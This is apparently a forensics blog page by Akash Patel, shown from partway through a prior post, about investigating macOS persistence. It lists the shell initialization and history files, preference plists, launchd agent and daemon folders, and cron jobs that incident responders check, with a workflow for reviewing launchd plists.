(Bash/Zsh). UNIFIEDLOGS : Reads .tracev3  files from Apple Unified Logs. UTMPX : Reads login data. ---------------------------------------------------------------------------------------------- Conclusion: Tried to simplifies the complex task of macOS log analysis  during incident response, providing investigators with practical tools and strategies for both live and binary log extraction. By using the right tools and understanding key log formats, you can efficiently gather the information you need to support forensic investigations. Akash Patel

  • Investigating macOS Persistence :macOS stores extensive configuration data in: Key Artifacts, Launch Daemons, and Forensic Strategies"

    Let’s explore the common file system artifacts investigators need to check during incident response (IR). ---------------------------------------------------------------------------------------------- 1. Commonly Abused Files for Persistence Attackers often target shell initialization files  to maintain persistence by modifying the user’s environment, triggering scripts, or executing binaries. Zsh Shell Artifacts  (macOS default shell since Catalina) Global Zsh Files: /etc/zprofile : Alters the shell environment for all users, setting variables like $PATH. Attackers may modify it to run malicious scripts upon login. /etc/zshrc : Loads configuration settings for all users. Since macOS Big Sur, this file gets rebuilt with system updates. /etc/zsh/zlogin : Runs after zshrc during login and often used to start GUI tools. User-Specific Zsh Files: Attackers may also modify individual user shell files located in the user’s home directory (~): ~/.zshenv  (optional) ~/.zprofile ~/.zshrc ~/.zlogin ~/.zlogout  (optional) User History ~/.zsh_history ~/.zsh_sessions (directory ) These files are loaded in sequence during login, giving attackers multiple opportunities to run malicious code. Note :During IR collection it is advised to check all the files (including ~/.zshenv & ~/.zlogout if they are present) to check for signs of attacker activity ---------------------------------------------------------------------------------------------- 2. User History Files Tracking a user’s shell activity can provide valuable insights during an investigation. The .zsh_history  file logs the commands a user entered into the shell. By default, this file stores the last 1,000 commands, but the number can be configured via SAVEHIST and HISTSIZE in /etc/zshrc. Important Note : The history file is only written to disk when the session ends. During live IR, make sure active sessions are terminated to capture the latest data. Potential Manipulation : Attackers may selectively delete entries or set SAVEHIST and HISTSIZE to zero, preventing commands from being logged. Another place to check is the .zsh_sessions  directory. This folder stores session and temporary history files, which may contain overlooked data. ---------------------------------------------------------------------------------------------- 3. Bash Equivalents For systems where Bash  is in use (either as an alternative shell or legacy setup), investigators should review the following files, which serve the same purpose as their Zsh counterparts: ~/.bash_history ~/.bash_profile ~/.bash_login ~/.profile ~/.bashrc ~/.bash_logout Attackers can modify these files to achieve persistence or hide their activity. ---------------------------------------------------------------------------------------------- 4. Installed Shells It's not uncommon for users to install other shells. To verify which shells are installed, check the /etc   folder , and look at the user's home directory for history files. If multiple shells have been installed, you may find artifacts from more than one shell. ---------------------------------------------------------------------------------------------- 5. Key File Artifacts for User Preferences macOS stores extensive configuration data in each user’s ~/Library/Preferences Some of these files are particularly useful during an investigation. Browser Downloads : Quarantine Information : Found in the com.apple.LaunchServices.QuarantineEventsV* SQLite database, this file logs information about executable files downloaded from the internet, including URLs, email addresses, and subject lines. Recently Accessed Files : macOS Mojave and earlier : com.apple.RecentItems.plist. macOS Big Sur and later : com.apple.shared.plist   Finder Preferences : com.apple.finder.plist  file contains details on how the Finder app is configured, including information on mounted volumes. Keychain Preferences : com.apple.keychainaccess.plist   file logs keychain preferences and the last accessed keychain, which can provide clues about encrypted data access. Investigation Note : Be aware that attackers can modify or delete these files, and they may not always be present. ---------------------------------------------------------------------------------------------- macOS Common Persistence Mechanisms Attackers use various strategies to maintain persistence on macOS systems, often exploiting system startup files or scheduled tasks. 1. Startup Files Attackers frequently modify system or user initialization files  to add malicious scripts or commands. These files are read when the system or user session starts, making them a common target. 2. Launch Daemon (launchd) The l aunchd  daemon controls services and processes triggered during system boot or user login. While it’s used by legitimate applications, attackers can exploit it by registering malicious property list (.plist) files  or modifying existing ones to point to malicious executables. Investigating launchd  on a Live System: You can use the launchctl  command to list all the active jobs: launchctl list This command will show: PID : Process ID of running jobs. Status : Exit status or the signal that terminated the job (e.g., -9 for a SIGKILL). Label : Name of the task, sourced from the .plist file that created the job. Investigating launchd  on Disk Images: The launchd process is owned by root and normally runs as PID1 on a system. It is the only process which can’t be killed while the system is running . This allows it to create jobs that can run as a range of user accounts. Jobs are created by property list (plist) files in specific locations, which point to executable files. The launchd process reads the plist and launches the file with any arguments or instructions as set in the plist. To analyze launchd  in a system image or offline triage: Privileged Jobs : Check these folders for startup tasks that run as root or other users: /Library/LaunchAgents: Per-user agents for all logged-in users, installed by admins. /Library/LaunchDaemons : System-wide daemons, installed by admins. /System/Library/LaunchAgents : Apple-provided agents for user logins. /System/Library/LaunchDaemons : Apple-provided system-wide daemons. User Jobs : Jobs specific to individual users are stored in: /Users/(username)/Library/LaunchAgents 3. Cron Tasks Similar to Linux systems, cron manages scheduled tasks in macOS. Attackers may create cron jobs that trigger the execution of malicious scripts at regular intervals. ---------------------------------------------------------------------------------------------- Workflow for Analyzing Launchd Files When investigating launchd persistence, use this methodical approach: Check for Unusual Filenames : Look for spelling errors, odd filenames, or files that imitate legitimate names. Start in the /Library/LaunchAgents and /Library/LaunchDaemons folder. Sort by Modification Date : If you know when the incident occurred, sort the .plist files by modification date to find any changes made around the attack . Analyze File Contents : Check the Program and ProgramArguments keys in each .plist file . Investigate any executables they point to. Validate Executables : C onfirm if the executables are legitimate by checking their file hashes or running basic forensic analysis , such as using the strings command or full reverse engineering. ---------------------------------------------------------------------------------------------- Final Thoughts When investigating a macOS system, checking these file system artifacts  is crucial. From shell initialization files  that may be altered for persistence to history files  that track user activity, these files provide a window into the state of the system. By examining user preferences  and quarantine data , and Persistence Mechanisms you can further uncover potential signs of compromise or abnormal behavior. Akash Patel

bottom of page